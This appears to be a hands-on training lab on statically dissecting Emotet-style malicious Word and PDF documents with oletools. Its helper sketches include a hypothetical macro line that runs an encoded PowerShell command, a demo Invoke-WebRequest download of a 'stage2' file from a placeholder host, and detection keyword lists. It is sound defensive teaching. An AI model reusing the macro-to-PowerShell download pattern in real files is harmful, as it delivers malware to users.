Lab 11: Document & Script Malware

Setup

git clone https://github.com/plaintext-security/plaintext-labs
cd plaintext-labs/malware/11-document-script-malware
make up
make fetch-sample      # pulls a real maldoc from MalwareBazaar into the isolated container
make demo

⚠ This lab analyzes a live malicious document. Handle it accordingly.

- Static only: never open it. A maldoc is live malware. Do not open the document in Word, Excel, or any viewer; do not enable macros; and do not execute the VBA or the PowerShell it drops. You only ever parse it: olevba extracts and reads the macro source; oleid/pdfid count risk indicators. Reading the macro is safe; running it is not.
- Isolation. All work stays inside the isolated container; never copy the sample to your host or to a Windows machine where a double-click could detonate it.
- Hygiene. The sample is fetched at lab time (password-protected zip, password infected) and is never committed: .gitignore covers samples/. make fetch-sample needs a free abuse.ch Auth-Key (set MB_AUTH_KEY). The default tag is maldoc; for the Emotet downloader specifically, run TAG=Emotet make fetch-sample.
- Offline fallback. No key, or MalwareBazaar unreachable? Skip make fetch-sample; make demo falls back to the bundled synthetic suspicious.doc / suspicious.pdf / obfuscated.ps1, which are legible, deterministic, and benign.

Scenario

A triage queue drops a Word attachment an email gateway flagged as a likely maldoc — most likely Emotet, the modular downloader that for years arrived as exactly this: a phishing Office document whose macro launches PowerShell to pull the next stage. Before anyone opens it (and nobody opens it), the team needs a static dissection for the case ticket: extract the embedded VBA macro without running it, deobfuscate it, and recover the PowerShell downloader and its URLs/IOCs from the source alone. Your job is to produce that dissection with olevba (Decalage's oletools), map what you find to Emotet's delivery chain — T1566.001 (spearphishing attachment) → T1059.005 (VBA) → T1059.001 (PowerShell) — and write the IOC table the intel team can action.

Throughout, the sample = the real maldoc that make fetch-sample drops in samples/ (path printed by the target). In offline mode it is the bundled synthetic suspicious.doc (plus suspicious.pdf and obfuscated.ps1) — benign, but structured to exercise the same olevba/pdfid signals a real maldoc trips.

Do

[ ] Fingerprint the document with oleid before you touch the macro. Run oleid against the sample. Record the file type (OLE2 vs OpenXML), and which indicators it raises (VBA macros present, encrypted, external relationships/links, Flash/objects). oleid is your go/no-go: it tells you whether there is a macro worth extracting before you spend time on it.

Hint: oleid /lab/samples/<sample> (real) or oleid /lab/data/suspicious.doc (offline). For a real maldoc you do not know the structure — that is the point.
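The OLE2 vs OpenXML distinction in this step can also be read straight from the file's first bytes. The following is a minimal sketch, not a substitute for oleid: it only compares magic bytes (the Compound File Binary signature for OLE2, the ZIP local-file header for OpenXML) and raises none of oleid's indicators. The function names are hypothetical.

```python
# Sketch only: classifies a file by its leading magic bytes. It reads raw bytes
# and never hands the document to Office or any viewer.
OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # Compound File Binary signature
ZIP_MAGIC = b"PK\x03\x04"                        # ZIP local file header (OpenXML is a ZIP)
RTF_MAGIC = b"{\\rt"                             # start of an RTF header
PDF_MAGIC = b"%PDF-"                             # PDF header


def container_type(header: bytes) -> str:
    """Return a coarse container label for the first bytes of a file."""
    if header.startswith(OLE2_MAGIC):
        return "OLE2"
    if header.startswith(ZIP_MAGIC):
        return "ZIP (possibly OpenXML)"
    if header.startswith(RTF_MAGIC):
        return "RTF"
    if header.startswith(PDF_MAGIC):
        return "PDF"
    return "unknown"


def container_type_of_file(path: str) -> str:
    """Read only the first 8 bytes of the file and classify them."""
    with open(path, "rb") as fh:
        return container_type(fh.read(8))
```

A ZIP header alone does not prove the file is an Office document, which is why the label says "possibly"; oleid and olevba inspect the container contents to settle that.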

[ ] Extract and read the VBA macro with olevba; never run it. Run olevba on the sample. It pulls the macro source out of the OLE/OpenXML container statically and decodes common string obfuscation (hex, base64, StrReverse); with --deobf it also attempts to resolve VBA expressions such as string concatenation and Chr() sequences. Record: the auto-execute handler (AutoOpen / Document_Open / Workbook_Open), every Shell / CreateObject / WScript / powershell reference, and olevba's flagged IOCs and risk lines. What does the macro intend to do on open?

Hint: olevba /lab/samples/<sample>. Read the VBA MACRO, ANALYSIS, and IOC sections. Emotet-style macros stage and launch a PowerShell one-liner — find where the macro hands off to PowerShell. You are reading source, not executing anything.
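Once olevba has printed the macro source, the items to record in this step can be located with a plain text scan. The sketch below assumes you have saved that source as text; the keyword lists come from the step above and are far shorter than olevba's own rule set, and the sample macro is a hypothetical, benign stand-in.

```python
import re

# Handler and keyword lists are taken from the lab step; they are illustrative,
# not olevba's actual detection rules.
AUTOEXEC = ("AutoOpen", "Document_Open", "Workbook_Open")
SUSPICIOUS = ("Shell", "CreateObject", "WScript", "powershell")


def scan_vba(source: str) -> dict:
    """Return (line number, keyword) pairs for auto-exec handlers and risky calls."""
    hits = {"autoexec": [], "suspicious": []}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name in AUTOEXEC:
            if re.search(rf"\b{name}\b", line, re.IGNORECASE):
                hits["autoexec"].append((lineno, name))
        for name in SUSPICIOUS:
            if re.search(rf"\b{name}\b", line, re.IGNORECASE):
                hits["suspicious"].append((lineno, name))
    return hits


# Hypothetical macro text standing in for olevba's extracted source.
SAMPLE = '''Sub Document_Open()
    Dim cmd As String
    cmd = "powershell -enc " & blob
    CreateObject("WScript.Shell").Run cmd, 0
End Sub'''

if __name__ == "__main__":
    for kind, found in scan_vba(SAMPLE).items():
        print(kind, found)
```

The scan works on text only, so it is as safe as reading the olevba output by eye; it will miss anything the macro assembles at runtime, which is where the deobfuscation step comes in.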

[ ] Recover the obfuscated PowerShell downloader from the macro. The macro typically does not contain the URLs in cleartext — it builds a base64 / split-string PowerShell command and passes it to powershell -enc (or concatenates an encoded blob). Pull that command out of the olevba output, base64-decode it (UTF-16LE — PowerShell's native encoding), and recover the staging URLs / file paths / IOCs it would have fetched. Use the bundled helper as a starting point: python3 /lab/data/decode_ps1.py <file>.

Hint: a real Emotet maldoc lists several fallback download URLs. For the offline synthetic, obfuscated.ps1 carries one clearly-fake URL so you can see the exact decode pattern (FromBase64String → Unicode.GetString).
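The decode pattern described here (base64, then UTF-16LE) is short enough to sketch. This is not the bundled decode_ps1.py, whose contents are not shown in this lab; it is a minimal illustration with hypothetical function names, and the URL regex is a simple assumption that will not catch URLs the script builds from split strings.

```python
import base64
import re

# Simple http(s) matcher; stops at whitespace, quotes, angle brackets, and ")".
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)


def decode_encoded_command(blob: str) -> str:
    """Base64-decode a PowerShell -enc argument and interpret it as UTF-16LE text."""
    raw = base64.b64decode(blob)
    return raw.decode("utf-16-le", errors="replace")


def extract_urls(text: str) -> list:
    """Pull http(s) URLs out of decoded script text, keeping first-seen order."""
    seen = []
    for url in URL_RE.findall(text):
        if url not in seen:
            seen.append(url)
    return seen


if __name__ == "__main__":
    # Build a benign stand-in blob; the URL uses the reserved .invalid TLD.
    script = "Invoke-WebRequest 'http://example.invalid/stage2.bin' -OutFile $env:TEMP\\s.bin"
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    decoded = decode_encoded_command(blob)
    print(decoded)
    print(extract_urls(decoded))
```

Decoding as UTF-8 instead of UTF-16LE leaves a NUL byte between every character, which is a quick way to recognise that you picked the wrong encoding.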

[ ] (If your sample is a PDF) triage it with pdfid. Some maldoc campaigns ship a PDF lure instead. Run pdfid on the sample and record counts for /JS, /JavaScript, /OpenAction, /AA, /EmbeddedFile, /Launch. Which combination auto-runs code on open?

Hint: /JS (or /JavaScript) together with /OpenAction indicates JavaScript that is set to execute automatically when the PDF is opened; /AA can attach actions to other events. Use the bundled suspicious.pdf if your fetched sample is a Word doc.
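To make the counts in this step concrete, here is a naive sketch of keyword counting over raw PDF bytes. It is an assumption-laden simplification: it matches literal names only, so it will miss names written with hex escapes or hidden inside compressed streams, and its numbers may differ from pdfid's. The function names are hypothetical.

```python
import re

# Keyword list from the lab step.
PDF_KEYWORDS = ("/JS", "/JavaScript", "/OpenAction", "/AA", "/EmbeddedFile", "/Launch")


def count_pdf_keywords(data: bytes) -> dict:
    """Count literal occurrences of each name that are not followed by a letter or digit."""
    counts = {}
    for kw in PDF_KEYWORDS:
        pattern = re.escape(kw.encode("ascii")) + rb"(?![A-Za-z0-9])"
        counts[kw] = len(re.findall(pattern, data))
    return counts


def auto_runs_script(counts: dict) -> bool:
    """Heuristic: a script keyword is present together with an automatic trigger."""
    has_script = counts["/JS"] > 0 or counts["/JavaScript"] > 0
    has_trigger = counts["/OpenAction"] > 0 or counts["/AA"] > 0
    return has_script and has_trigger


if __name__ == "__main__":
    # Hand-written fragment, not a complete or valid PDF.
    fragment = b"1 0 obj << /OpenAction 2 0 R >> 2 0 obj << /S /JavaScript /JS (app.alert(1)) >>"
    counts = count_pdf_keywords(fragment)
    print(counts)
    print("auto-run heuristic:", auto_runs_script(counts))
```

Treat the result as a prompt to look closer, not a verdict: nonzero counts say the keywords exist, not what the script does.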

[ ] Build the IOC table. For each artifact, record: SHA-256 hash, auto-execution trigger, embedded script/payload type (VBA → PowerShell, PDF JS, etc.), the decoded staging URLs / paths, and the ATT&CK technique IDs. Anchor the chain to Emotet: T1566.001 (delivery) → T1059.005 (VBA macro) → T1059.001 (PowerShell) → T1547.001 (Run-key persistence, if present). This is your deliverable.
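One way to keep the table consistent is to generate it. The sketch below assumes the column names listed under Deliverables; the helper names and the row values are hypothetical placeholders, and the hash in the usage example is computed over a dummy byte string, not over any sample.

```python
import hashlib

# Column names as listed in the Deliverables section.
COLUMNS = ("Artifact", "SHA-256", "Trigger", "Payload Type", "Decoded IOCs", "ATT&CK IDs")


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of the given bytes as lowercase hex."""
    return hashlib.sha256(data).hexdigest()


def ioc_table(rows: list) -> str:
    """Render rows (dicts keyed by COLUMNS) as a markdown table; missing keys become empty cells."""
    lines = [
        "| " + " | ".join(COLUMNS) + " |",
        "|" + "|".join(" --- " for _ in COLUMNS) + "|",
    ]
    for row in rows:
        lines.append("| " + " | ".join(str(row.get(col, "")) for col in COLUMNS) + " |")
    return "\n".join(lines)


if __name__ == "__main__":
    # Placeholder row: values are illustrative, not findings from a real sample.
    row = {
        "Artifact": "suspicious.doc",
        "SHA-256": sha256_hex(b"placeholder bytes, not the sample"),
        "Trigger": "Document_Open",
        "Payload Type": "VBA -> PowerShell",
        "Decoded IOCs": "http://example.invalid/stage2.bin",
        "ATT&CK IDs": "T1566.001, T1059.005, T1059.001",
    }
    print(ioc_table([row]))
```

In the lab itself you would hash the file's bytes inside the container and paste only the resulting hex string into ioc-table.md.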

Success criteria: you're done when

[ ] oleid correctly identifies the container type and flags the VBA macro before extraction.
[ ] olevba output shows the extracted macro source and the auto-execute handler — read, never run.
[ ] The obfuscated PowerShell command is base64-decoded and its staging URLs/IOCs recovered.
[ ] (PDF sample) pdfid shows /JS and /OpenAction counts greater than 0.
[ ] ioc-table.md contains every artifact with SHA-256, trigger, payload type, decoded IOCs, and ATT&CK IDs mapped to the Emotet delivery chain.

Deliverables

Commit to your portfolio repo:

- ioc-table.md: a markdown table with columns Artifact, SHA-256, Trigger, Payload Type, Decoded IOCs, ATT&CK IDs.
- doc_triage.sh: the triage script from Automate & own it.
- Do not commit the real maldoc (or the synthetic .doc/.pdf/.ps1), and do not commit screenshots of the macro source. The decoded IOC strings in your table are fine; the live artifact never leaves the container.

Automate & own it

Required. Write doc_triage.sh, a shell script that:

1. Accepts a file path as an argument.
2. Computes and prints the SHA-256.
3. Detects the file type (file command).
4. If OLE/OpenXML (.doc/.docx/.docm/.xls/.xlsm/.rtf), runs olevba --detect (or oleid) and prints the result, never opening or executing the document.
5. If .pdf, runs pdfid and greps for /JS, /OpenAction, /EmbeddedFile, /Launch.
6. If .ps1 (or an extracted PowerShell blob), searches for FromBase64String / -enc and prints the line number.
7. Prints a one-line triage verdict: [HIGH], [MEDIUM], or [LOW] based on what it found.

Draft with AI assistance — then read every line: a triage script that opens the file instead of parsing it is the one mistake that detonates the sample. Test against the bundled synthetic files (and the real one if fetched). Commit doc_triage.sh.
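Before writing the shell, it can help to pin down the decision logic on its own. The sketch below is in Python purely to make that logic testable; the deliverable is still a shell script. The function names are hypothetical and the scoring thresholds are an assumption, not the lab's rubric. Note that pick_tool only returns a tool name; it runs nothing and opens nothing.

```python
import os

# Extension list from step 4 of the script requirements.
OFFICE_EXTS = {".doc", ".docx", ".docm", ".xls", ".xlsm", ".rtf"}


def pick_tool(path: str) -> str:
    """Map a file extension to the parser the script would call (name only; nothing is run)."""
    ext = os.path.splitext(path)[1].lower()
    if ext in OFFICE_EXTS:
        return "olevba"
    if ext == ".pdf":
        return "pdfid"
    if ext == ".ps1":
        return "grep"
    return "none"


def verdict(has_macro_or_script: bool, has_autoexec: bool, has_encoded_payload: bool) -> str:
    """Hypothetical scoring: two or more signals is HIGH, one is MEDIUM, none is LOW."""
    score = sum([has_macro_or_script, has_autoexec, has_encoded_payload])
    if score >= 2:
        return "[HIGH]"
    if score == 1:
        return "[MEDIUM]"
    return "[LOW]"


if __name__ == "__main__":
    print(pick_tool("/lab/data/suspicious.doc"), verdict(True, True, False))
```

Dispatching on the extension alone is fragile because attackers rename files; the script requirements call for the file command in step 3, and the verdict should lean on what the parsers report.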

AI acceleration

Paste the extracted VBA macro source from olevba into a model. Prompt: "This is a VBA macro extracted statically from a suspicious document. List any IOCs, identify the auto-execute handler, decode any obfuscated PowerShell, and assess whether this macro would download or execute a payload — do not assume I will run it." Verify the assessment against what you found manually in steps 2–3. The model is fast at deobfuscation; the judgment that it deobfuscated correctly is yours.

Connects forward

Module 12 takes the IOCs you just extracted and structures them into a MISP-compatible format, maps them to ATT&CK, and prepares them for sharing with threat intelligence platforms.

Marketable proof

"I triage a real malicious Office document without ever opening it — extracting and deobfuscating the embedded VBA with olevba, recovering the staged PowerShell downloader and its IOCs statically, and mapping the chain to the Emotet delivery technique set (T1566.001 → T1059.005 → T1059.001)."

Stretch

Run olevba --deobf and compare its automatic deobfuscation against your manual decode of the PowerShell blob. Where do they differ, and why?
Pull a second sample with a different tag (TAG=Emotet vs maldoc, or an .xlsm) and diff the macro structure: do both use the same auto-exec handler and the same PowerShell hand-off pattern? Note the family fingerprint.
